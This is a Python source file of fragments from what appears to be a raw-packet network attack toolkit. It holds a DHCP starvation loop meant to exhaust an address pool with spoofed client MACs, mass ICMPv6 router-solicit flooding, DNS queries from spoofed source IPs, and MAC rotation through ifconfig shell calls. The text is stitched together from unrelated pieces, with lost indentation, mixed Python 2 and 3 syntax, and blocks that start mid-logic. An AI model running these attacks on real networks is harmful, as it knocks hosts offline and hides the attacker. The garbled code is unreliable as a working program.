def send_dhcp_discover():
sleep(1)
eth = Ethernet_raw()
dhcp = DHCP_raw()
Base.print_info("Sending discover packets...")
Base.print_info("Delay between DISCOVER packets: ", str(args.delay),
" sec.")
Base.print_info("Start sending packets: ",
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
discover_raw_socket = socket(AF_PACKET, SOCK_RAW)
discover_raw_socket.bind((listen_network_interface, 0))
try:
while True:
client_mac = eth.get_random_mac()
transaction_id = randint(1, 4294967295)
discover_packet = dhcp.make_request_packet(
source_mac=your_mac_address,
client_mac=client_mac,
transaction_id=transaction_id,
dhcp_message_type=1,
host_name=None,
requested_ip=None,
option_value=dhcp_option_value,
option_code=dhcp_option_code,
relay_agent_ip=your_ip_address)
discover_raw_socket.send(discover_packet)
transactions[transaction_id] = client_mac
if int(time() - start_time) > args.timeout:
if ack_received:
Base.print_success(
"IP address pool is exhausted: ",
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
else:
Base.print_error("DHCP Starvation failed timeout!")
sleep(1)
exit(1)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
discover_raw_socket.close()
exit(0)
print("Creating packets...")
if args.notspoofmac:
print(" Your MAC address is not spoofed!")
eth = Ethernet_raw()
dhcp = DHCP_raw()
while count < count_max:
if args.notspoofmac:
SRC_MAC = current_mac_address
else:
SRC_MAC = eth.get_mac_for_dhcp_discover()
CLIENT_MAC = eth.get_random_mac()
HOST_NAME = Base.make_random_string(8)
current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC,
HOST_NAME)
PACKETS.append(current_packet)
count += 1
if count > count_percent:
stdout.flush()
stdout.write(" Complete: " + str(index_percent + 1) + "% \r")
index_percent += 1
count_percent = (count_max / 100) * index_percent
NUMBER_OF_PACKETS = int(args.packets)
NUMBER_OF_ITERATIONS = int(args.iterations)
src_ipv6_address = Base.get_netiface_ipv6_link_address(
current_network_interface)
else:
src_ipv6_address = args.src_ipv6
print Base.c_info + "Interface: " + current_network_interface
print Base.c_info + "Src IPv6 address: " + src_ipv6_address
print Base.c_info + "Src MAC address: " + src_mac_address
print Base.c_info + "Sending ICMPv6 router solicit packets ..."
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
try:
for _ in range(args.number_of_packets):
rs_packet = icmpv6.make_router_solicit_packet(
src_mac_address, src_ipv6_address, True, eth.get_random_mac())
rs_packets.append(rs_packet)
for iteration in range(args.number_of_iterations):
print Base.c_info + "Iteration: " + str(iteration)
index = 0
while index < args.number_of_packets:
SOCK.send(rs_packets[index])
index += 1
except:
print Base.c_error + "Do not send ICMPv6 router solicit packets!"
SOCK.close()
exit(1)
print Base.c_success + "Send all ICMPv6 router solicit packets!"
SOCK.close()
while count < count_max:
for NS in NS_list.keys():
DST_MAC = NS_list[NS]["MAC"]
DST_IP = NS_list[NS]["IP"]
DST_PORT = NS_list[NS]["PORT"]
SRC_MAC = None
SRC_IP = None
SRC_PORT = randint(2049, 65535)
if args.notspoofmac:
SRC_MAC = your_mac_address
else:
SRC_MAC = eth.get_random_mac()
if args.notspoofip:
SRC_IP = your_ip_address
else:
if len(spoofed_hosts) > 1:
SRC_IP = str(choice(spoofed_hosts))
elif len(spoofed_hosts) == 1:
SRC_IP = str(spoofed_hosts[0])
else:
print("Bad spoofed network!")
exit(1)
TID = randint(1, 65535)
if args.pathtodomainlist is not None:
# region Get old ip and mac addresses
old_mac_address = Base.get_netiface_mac_address(
listen_network_interface)
old_ip_address = Base.get_netiface_ip_address(
listen_network_interface)
# endregion
# region Stop network
Base.print_info("Stop network ...")
system('service network-manager stop')
system('service networking stop 2>/dev/null')
system('service network stop 2>/dev/null')
# endregion
while True:
new_mac_address = eth.get_random_mac()
# region Change MAC
Base.print_info("New MAC address: ", new_mac_address)
system('ifconfig ' + listen_network_interface + ' down')
system('ifconfig ' + listen_network_interface + ' hw ether ' +
new_mac_address)
system('ifconfig ' + listen_network_interface + ' up')
# endregion
# region Start network
system('service network-manager start')
system('service networking start 2>/dev/null')
system('service network start 2>/dev/null')
# endregion
if args.src_ipv6 is None:
src_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface)
else:
src_ipv6_address = args.src_ipv6
Base.print_info("Interface: " + current_network_interface)
Base.print_info("Src IPv6 address: " + src_ipv6_address)
Base.print_info("Src MAC address: " + src_mac_address)
Base.print_info("Sending ICMPv6 router solicit packets ...")
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
try:
for _ in range(args.number_of_packets):
rs_packet = icmpv6.make_router_solicit_packet(src_mac_address, src_ipv6_address, True, eth.get_random_mac())
rs_packets.append(rs_packet)
for iteration in range(args.number_of_iterations):
Base.print_info("Iteration: " + str(iteration))
index = 0
while index < args.number_of_packets:
SOCK.send(rs_packets[index])
index += 1
except:
Base.print_error("Do not send ICMPv6 router solicit packets!")
SOCK.close()
exit(1)
Base.print_success("Send all ICMPv6 router solicit packets!")
SOCK.close()